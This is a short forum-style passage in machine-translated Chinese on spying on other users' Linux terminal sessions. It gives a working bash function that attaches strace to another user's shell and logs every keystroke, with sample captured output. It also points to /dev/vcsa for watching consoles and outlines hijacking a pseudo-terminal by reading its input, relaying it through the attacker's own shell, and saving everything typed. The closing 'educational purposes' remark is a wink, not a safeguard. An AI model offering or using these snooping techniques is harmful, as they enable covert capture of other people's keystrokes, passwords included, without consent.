Phrack 文章中的linspy.c代码是一个 Linux 内核模块。它不会针对现代内核进行编译,因为内部内核接口经常更改。
但是,它使用的基本方法是可靠的(尽管它完全缺少在 SMP 环境中正确性所需的锁定),并且使用足够的肘部油脂,您应该能够将其移植到针对最新内核进行编译。
function spy() {
ptsnum=`ps awfux | grep pt[s]\/"$1" | awk '/bas[h]/{print $2}'` ;
/usr/bin/strace -s 1000 -t -f -p $ptsnum 2>&1 3>&1 \
| grep -Poi 'write(...\"[[:print:]]{1,2}\"[.][.][.][,]..)' ;
}
[436] klikevil@epiphany ~ $ w
09:36:43 up 12:06, 6 users, load average: 0.46, 0.29, 0.20
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
klikevil pts/0 75.125.126.8 23:05 2:19m 10:33 0.18s cmd
klikevil pts/1 75.125.126.8 00:18 6:50m 0.06s 0.04s sshd: klikevil [priv]
klikevil tty7 :0 09:02 17:07m 2:02 0.32s x-session-manager
klikevil pts/2 :0.0 09:03 3:30 0.08s 0.08s bash
klikevil pts/3 :0.0 09:03 0.00s 0.76s 0.00s w
klikevil pts/4 :0.0 09:06 3:13 0.46s 0.00s /bin/sh /usr/bin/thunder
[437] klikevil@epiphany ~ $ spy 2
write(2, "e"..., 1)
write(2, "c"..., 1)
write(2, "h"..., 1)
write(2, "o"..., 1)
write(2, " "..., 1)
write(2, "s"..., 1)
write(2, "u"..., 1)
write(2, "p"..., 1)
write(2, " "..., 1)
write(2, "d"..., 1)
write(2, "o"..., 1)
write(2, "g"..., 1)
write(2, "\n"..., 1)
^C
如果您不介意对一堆换行符进行排序,似乎工作得很好。至于TTY..tail -f /dev/vcsa1-6
杰西卡
我两次进入远程 linux 机器,产生 /dev/pts/0 和 /dev/pts/1。从 0 开始,我可以打开 1 进行读取,从而窃取用户输入到 1 的所有内容。如果我想让他们看到他们的输入,我必须将其写回 /dev/pts/1。当然,他们的输入永远不会进入他们的 shell,所以我必须在我的最后(在 0 上)创建一个 shell 进程并将他们的输入通过管道传输,然后将 shell 传回 1。
这一切对我来说都很好。虽然这一切都在进行,但我可以在任何我喜欢的地方保存在此过程中读取和写入的所有数据。
当然,除非您是 root 用户或正在窥探您拥有的会话,否则您不能这样做,但您只是出于教育目的而想要这样做,对吧?